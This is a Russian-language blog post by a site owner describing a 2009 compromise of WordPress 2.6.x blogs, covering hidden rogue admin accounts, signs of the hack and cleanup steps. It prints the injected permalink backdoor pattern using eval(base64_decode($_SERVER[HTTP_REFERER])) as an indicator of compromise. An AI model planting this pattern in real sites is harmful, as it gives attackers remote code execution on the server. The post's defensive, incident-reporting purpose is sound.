Сразу скажу - пишу не в качестве копипаста, а как непосредственный участник событий. Не могу точно сказать количество блогов ( из тех, что я создавал ), которые взломаны. Все еще не проверил. Но 6 блогов в версиях до 2.7 взломаны таким образом. Все в версиях 2.6.4 и 2.6.5. Это не показательно, но факт. Блоги на версиях 2.7, 2.8.2 не тронуты. Обольщаться не нужно - вероятнее всего просто время жизни меньше и проиндексированы слабее.

О чем речь. Приведу описание Юрия Белотицкого с его статьи " Взлом WordPress. HTTP_REFERER в url " ( настоятельно рекомендую прочитать здесь ):

Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Уязвимость заключается в том, что низкоуровневый юзер может получить доступ к некоторым страницам админки, на которых ему делать нечего. (Чтобы пионеры не игрались, я не буду описывать сам метод.). Хакер регистрируется, делает себя админом и хитрым образом прячется, чтобы настоящий админ его не увидел в списке пользователей. В принципе, для того, чтобы изменить схему ЧПУ, не нужно даже повышать уровень. Так что получается, что имеют место две проблемы: доступ куда не надо и левые админы.

То есть - блоги подвергнуты MySQL-инъекции, которая портит постоянные ссылки , превращая их в нерабочие.

Почти однозначным признаком взлома блога есть появление количества администраторов, которое больше созданного Вами ( смотреть в секции Пользователи - изображение ниже). При этом при переключении на Администраторы - они не видны.

Лечение тоже прописано у Ю.Б., и именно таким образом ситуацию получилось исправить. Единственно - достаточно долгая морока при большом количестве пользователей искать пользователя с наибольшим ID. И не забудьте прописать левый адрес электронной почты для созданного хакером админа - типа kozel@mail.ru.Так что при наличии опыта - лучше через базу данных. Да и дамп последний сохраненный проверьте.

P.S! Дыру залечил тоже одним из предложенных способов. Так что читайте внимательно рекомендации http://blog.portal.kharkov.ua/2009/09/06/hack/